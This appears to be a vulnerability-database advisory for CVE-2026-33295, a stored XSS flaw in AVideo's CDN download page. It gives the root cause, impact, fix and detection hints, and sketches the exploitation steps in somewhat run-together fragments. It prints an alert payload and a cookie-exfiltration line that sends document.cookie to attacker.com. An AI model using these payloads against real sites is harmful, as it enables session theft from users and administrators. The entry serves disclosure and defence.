
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33295 is a stored cross-site scripting (XSS) vulnerability in WWBN/AVideo, affecting all versions up to and including 25.0. The flaw resides in the CDN plugin's downloadButtons.php component, where the clean_title field of a video record is interpolated directly into a JavaScript string literal without escaping, allowing any authenticated user with video creation or editing privileges to inject arbitrary JavaScript. The vulnerability was published on March 18, 2026, and assigned a CVSS v3.1 base score of 5.4 (Medium) and a CVSS v4.0 base score of 8.2 (High) (GitHub Advisory, AVideo Security Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically in plugin/CDN/downloadButtons.php. At the vulnerable line, PHP echoes the clean_title value verbatim inside a single-quoted JavaScript string literal — downloadURLOrAlertError(url, {}, '<php echo $video['clean_title']; ?>.' + format, progress); — without applying any JavaScript-context escaping such as json_encode or htmlspecialchars. An attacker can terminate the string prematurely by including a single quote in the video title and inject arbitrary JavaScript expressions. The attack requires low privileges (any account that can create or edit a video) and network access, with exploitation triggered when any victim user visits the download page for the attacker-controlled video (GitHub Advisory, AVideo Commit).
Successful exploitation allows the injected JavaScript to execute in the browser of any user — including administrators — who visits the download page for an attacker-controlled video. This enables session cookie theft, credential harvesting, and unauthorized actions performed on behalf of the victim within the application. Because the payload is stored server-side and triggers automatically without further attacker interaction, the blast radius extends to all users who access affected download pages, including privileged accounts (GitHub Advisory, AVideo Security Advisory).
A proof-of-concept (PoC) Python script is publicly available in the official GitHub security advisory, demonstrating login, malicious video creation with the payload ');alert(document.cookie);//, and the trigger URL path — forming a complete reproduction sequence (AVideo Security Advisory). The EPSS score is approximately 0.016% (2nd percentile), indicating low current exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
/plugin/CDN/downloadButtons.php endpoints./user with user[user] and user[pass] parameters./video/addNew with a crafted title field containing the payload ');alert(document.cookie);// (or a more sophisticated payload for cookie exfiltration, e.g., ');fetch('https://attacker.com/?c='+document.cookie);//).videos_id assigned to the newly created video from the server response or by browsing the video listing.https://target.com/plugin/CDN/downloadButtons.php?videos_id=<ID>. This can be done via phishing, embedding the link in content, or social engineering./plugin/CDN/downloadButtons.php?videos_id=<ID> from multiple users, particularly administrators; POST requests to /video/addNew with unusually short or syntactically suspicious titles containing single quotes or JavaScript syntax.alert, fetch, document.cookie, // comment sequences).The fix was applied in commit 30cdd82, which replaces the verbatim echo of clean_title with json_encode($video['clean_title']), ensuring proper JavaScript-context escaping (AVideo Commit). Administrators should upgrade AVideo to version 26.0 or later as the primary remediation. As additional hardening measures, implement a Content Security Policy (CSP) header to restrict script execution, apply input validation and output encoding for all user-supplied video metadata, and restrict video creation/editing permissions to trusted users only (GitHub Advisory).
The vulnerability was reported by security researcher fg0x0 and published by the AVideo maintainer DanielnetoDotCom on March 18, 2026 (AVideo Security Advisory). A technical write-up was published by Infinitsec covering the stored XSS via unescaped video title in CDN downloadButtons.php (Infinitsec Blog). The vulnerability received routine coverage from vulnerability tracking platforms including VulDB and INCIBE-CERT, with no notable broader media attention or significant community controversy.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."